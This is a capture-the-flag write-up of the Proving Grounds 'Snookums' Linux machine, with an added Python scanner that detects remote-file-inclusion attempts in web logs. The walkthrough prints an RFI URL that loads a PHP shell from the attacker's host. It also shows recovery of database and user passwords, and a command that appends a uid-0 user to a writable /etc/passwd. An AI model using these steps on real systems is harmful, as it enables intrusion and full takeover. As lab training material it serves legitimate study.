
# Snookums

**Source**: Proving Grounds\
**OS**: Linux\
**Community Rating**: Intermediate

## **Enumeration & Reconnaissance**

* Autorecon revealed open ports:
  * FTP (21)
  * SSH (22)
  * **HTTP (80)**
  * RPC (111)
  * SMB (139 & 445)
  * **MySQL (3306 & 33060)**
* Usually, I’d check FTP first, especially since anonymous login was allowed, but I dove straight into HTTP (80) and got too involved to notice FTP until later.

## **Service Analysis**

* The HTTP server hosted a **Simple PHP Photo Gallery** (v0.8).

<figure><img src="/files/wda1BWU1wEU7ccBbHyOp" alt="" width="563"><figcaption><p>Simple PHP Photo Gallery</p></figcaption></figure>

* A version number at the bottom screamed "vulnerable." Searching for CVEs led me to **EDB-ID 48424** (no CVE assigned), an RFI vulnerability in the `img` parameter:

{% code overflow="wrap" fullWidth="true" %}

```
http://192.168.192.58/image.php?img=http://192.168.45.201/shell.php
```

{% endcode %}
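From the defender's side, the RFI request above is easy to spot in the web server logs: a file-include parameter should never carry a URL scheme. The following is an added example (not part of the original write-up) that scans Apache combined-log lines for query parameters whose value starts with a remote or stream-wrapper scheme, including percent-encoded variants; the log lines are constructed for this example and only reuse the two IPs and the `image.php?img=` URL from the write-up.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample Apache combined-log lines (not captured from the box).
# Line 1 is a benign gallery request, lines 2 and 3 carry a remote URL in
# the `img` parameter (line 3 with the scheme percent-encoded), line 4 is benign.
SAMPLE_LOG = """\
192.168.45.201 - - [10/May/2025:12:00:01 +0000] "GET /image.php?img=photos/cat.jpg HTTP/1.1" 200 5120
192.168.45.201 - - [10/May/2025:12:00:07 +0000] "GET /image.php?img=http://192.168.45.201/shell.php HTTP/1.1" 200 77
192.168.45.201 - - [10/May/2025:12:00:09 +0000] "GET /image.php?img=http%3A%2F%2F192.168.45.201%2Fshell.php HTTP/1.1" 200 77
192.168.45.201 - - [10/May/2025:12:00:12 +0000] "GET /index.php?page=about HTTP/1.1" 200 3100
"""

# Minimal parser for the fields we need from the combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Schemes that have no business appearing in a file-include parameter.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:")


def find_rfi_attempts(log_text):
    """Return one dict per query parameter whose (URL-decoded) value starts
    with a remote or stream-wrapper scheme."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined-log format
        parts = urlsplit(m.group("target"))
        # parse_qsl percent-decodes values, so "http%3A%2F%2F" is caught too.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if value.strip().lower().startswith(REMOTE_SCHEMES):
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "path": parts.path,
                    "param": name,
                    "value": value,
                    "status": int(m.group("status")),
                })
    return hits


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['path']} {hit['param']}={hit['value']} -> {hit['status']}")
```

A 200 status on such a hit (as opposed to a 4xx) is the signal worth alerting on, since it means the application accepted the parameter rather than rejecting it.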

## **Gaining Initial Access**

* I crafted a PHP reverse shell and hosted it on my machine. Initial attempts with ports 901/9911 failed, likely firewall issues. Switching to ports 80/22 worked, and I landed a shell as **apache**.

<figure><img src="/files/itsh2NY2QBBkEOmIhv5g" alt="" width="563"><figcaption><p>Initial Access</p></figcaption></figure>

* Uploaded `linpeas.sh`, which flagged a PHP config file containing MySQL credentials: **root:MalapropDoffUtilize1337**.

<figure><img src="/files/n8CooTjfGL8LsFpZl48x" alt="" width="375"><figcaption><p>Database Credentials</p></figcaption></figure>

{% code overflow="wrap" fullWidth="true" %}

```bash
mysql -u root -p
```

{% endcode %}

* Found the **SimplePHPGal** database, which had a users table with 3 users and their encoded passwords. I picked the user **michael** since it was the one that had a home directory.

<figure><img src="/files/8tpLe2GcJInJPsubswUF" alt="" width="375"><figcaption><p>Users Passwords</p></figcaption></figure>

{% code overflow="wrap" fullWidth="true" %}

```bash
echo "U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==" | base64 -d | base64 -d
```

{% endcode %}

* Decoding it gave **HockSydneyCertify123**.

<figure><img src="/files/J5TYOjNwaQ8RvsHeyIEX" alt="" width="563"><figcaption><p><strong>HockSydneyCertify123</strong></p></figcaption></figure>

## **Privilege Escalation**

* I then switched to **michael** and re-ran `linpeas.sh`, which revealed a **writable /etc/passwd**.

<figure><img src="/files/6WzrI8uF4WtLKehOBFtZ" alt="" width="563"><figcaption><p>/etc/passwd</p></figcaption></figure>

* This means we can add a new root user. I generated a password hash for "pwned":

{% code overflow="wrap" fullWidth="true" %}

```bash
openssl passwd pwned
```

{% endcode %}

<figure><img src="/files/vmwOYPUgy8zCZhX93Ogz" alt="" width="375"><figcaption><p>openssl passwd</p></figcaption></figure>

* Appended a new root user, kingkong, to `/etc/passwd` using `echo`:

{% code overflow="wrap" fullWidth="true" %}

```bash
echo "kingkong:\$1\$xr7pWWIR\$vNF8Z7sc8mgBu6u7ZETyT/:0:0:root:/root:/bin/bash" >> /etc/passwd
```

{% endcode %}

* Switching to **kingkong** granted root access.

<figure><img src="/files/oE3itiZ7j7F4PZappdAS" alt="" width="563"><figcaption><p>Root Access</p></figcaption></figure>

## **Lessons Learned**

* **FTP Blindness:** Skipping FTP can cost time; check obvious services first.
* **RFI Port Woes:** Firewalls hate fancy ports; stick to 80/443 for shells.
* **Double Encoding:** Always decode twice… or thrice.
* **/etc/passwd Write Abuse:** If writable, plant a root user and call it a day.
